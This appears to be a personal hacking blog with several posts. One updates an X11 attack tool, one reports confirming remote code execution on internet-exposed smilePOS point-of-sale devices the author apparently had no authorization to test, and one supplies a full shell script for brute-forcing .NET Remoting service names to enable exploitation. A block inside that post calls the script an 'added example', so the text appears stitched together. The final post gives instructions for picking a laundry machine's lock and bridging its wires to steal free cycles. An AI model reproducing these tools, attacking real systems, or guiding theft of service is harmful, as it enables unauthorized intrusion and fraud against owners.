Thursday, October 5, 2023

Update to Hax11 allows connecting to more display ports for a larger attack surface

I have updated Hax11 to connect to non-default display ports. The previous version only allowed connecting to display 0 (port 6000), but now you can connect to any display a system has available.

Example:

If you want to connect to display 1 (port 6001), use this command:

python hax11.py ip.addr.here 1

If you want to connect to display 0 use the old command style:

python hax11.py ip.addr.here

You can connect to display 1, 2, 3, and so on. I know it seems like a small change, but it at least doubles your attack surface. So while the change is small, the impact is big.

Get it HERE

Enjoy! 

Saturday, April 1, 2023

smilePOS RCE via MS .NET Remoting


While searching the internets for MS .NET Remoting deployments to test my service-name brute-force script, I stumbled on a gem.

While testing, I noticed that a lot of systems with port 9099 open were vulnerable to MS .NET Remoting abuse and also had a web port serving up a smilePOS login page. This was the first I had ever heard of it, so a quick Google search suggested these were POS devices of some sort, which made sense since all the ones I had found had the same ports and services running.

So with a bit more looking around I could confirm RCE on all the smilePOS devices I found; 2021.1.2103.0 is the only version tested. The service names my tool was able to identify are r1 and r2. If anyone has something to add, please let me know; otherwise, enjoy.

Monday, March 20, 2023

Automate brute forcing service names in vulnerable MS .NET Remoting deployments.

Anyone who is familiar with exploiting an MS .NET Remoting service knows that finding the correct service name can be a pain without the source code: the server dispatches each request by its object URI, so a request for a name that is not registered is rejected before the exploitable deserialization path is ever reached. If you don't know what MS .NET Remoting is, Google is a good place to start. The tool ExploitRemotingService makes the job a snap, but it still has the limitation of needing the right service name, and brute forcing by hand is just crazy.

I wanted to hack up something to make it less painful, so I searched the web for common object names, then searched GitHub for MS .NET Remoting apps and added the names they were using as well. Then I coded up a little bash script that uses the ExploitRemotingService tool and loops through the list I compiled. Testing so far shows it works like a charm, with a few bugs.

Still, I thought it could be a nice tool to have in your bag of holding, so I made it available on GitHub. I hope someone gets use out of it.

Usage: ./bfNET ip.addr port
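A minimal version of that loop, added here as an example rather than the bfNET script itself. It assumes ExploitRemotingService is run under mono with the command form `mono ExploitRemotingService.exe tcp://HOST:PORT/NAME ver` and that the tool exits non-zero when the server rejects the object URI; neither detail is stated on the page, so set EXPLOIT_CMD (or change try_service to grep the tool's output) to match your build. The starter wordlist is constructed and includes the r1 and r2 names reported in the smilePOS post above.

```shell
#!/bin/sh
# Brute-force the object URI (service name) of a .NET Remoting TCP channel by
# handing each candidate to ExploitRemotingService and keeping the ones the
# server accepts.  Added example, not the bfNET script from the post.
#
# Assumptions (not stated on the page): the tool runs as
#   mono ExploitRemotingService.exe tcp://HOST:PORT/NAME ver
# and exits non-zero when the server rejects the URI.  Set EXPLOIT_CMD to
# override the command used for each attempt.
EXPLOIT_CMD="${EXPLOIT_CMD:-mono ExploitRemotingService.exe}"

# Constructed starter list; the real bfNET wordlist is much longer.  r1 and r2
# are the names the smilePOS post reports.  '#' lines and blank lines are skipped.
default_wordlist() {
    cat <<'EOF'
RemoteService
RemotingServer
Server
Service
r1
r2
EOF
}

# try_service HOST PORT NAME -> exit 0 if the tool reached a registered service
try_service() {
    # shellcheck disable=SC2086  # EXPLOIT_CMD is deliberately word-split
    $EXPLOIT_CMD "tcp://$1:$2/$3" ver >/dev/null 2>&1
}

# bf_net HOST PORT [WORDLIST] -> prints "hit: tcp://HOST:PORT/NAME" per match,
# exit 0 if at least one candidate was accepted, 1 otherwise
bf_net() {
    bf_host=$1; bf_port=$2; bf_list=$3; bf_found=1
    if [ -n "$bf_list" ]; then
        bf_names=$(cat "$bf_list")
    else
        bf_names=$(default_wordlist)
    fi
    while IFS= read -r bf_name; do
        case $bf_name in ''|'#'*) continue ;; esac
        if try_service "$bf_host" "$bf_port" "$bf_name"; then
            echo "hit: tcp://$bf_host:$bf_port/$bf_name"
            bf_found=0
        fi
    done <<EOF
$bf_names
EOF
    return $bf_found
}

# Script entry point: ./bfnet_example.sh HOST PORT [WORDLIST]
if [ $# -ge 2 ]; then
    bf_net "$@"
fi
```

Each attempt is a full connection to the remoting port, so a long wordlist against a slow target takes a while; the exit status of bf_net lets you chain it (`bf_net host 9099 names.txt && ...`) without parsing its output.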

Get it here

Friday, January 13, 2023

Getting free cycles out of coin operated laundry machines

A friend of mine was telling me about how her landlord keeps raising the price on the washer and dryer in her apartment complex. She knew I liked playing with tech and machines, so she asked if we could figure out how to get the coins out. I explained that would be a bad idea, as it would be clear something was up if the machines never had money in them on collection day, but maybe we could figure out a way to get free use of them, which would be harder to detect. A door on top of the housing for the coin mechanism had a tubular lock, as seen below:


So I busted out my picks and got the door to open. Here is what I found when I bypassed the lock:

As you can see, it's just a few wires, so I figured this was our access point to free cycles. You can see the white bracket that connects the coin functions to the machine below:

So I disconnected them, and since there are only two wires, I figured a simple bridge of the two would likely give me the results I was hoping for. I then grabbed a paperclip to bridge them, and just like that we had free cycles! Here is what it looked like:

Now you just reconnect the wires, put the door back on, lock it, and push start. I gave the paperclip and tubular pick to my buddy so she can have free cycles at any place with greedy landlords. It was a fun little project and I was happy to help out.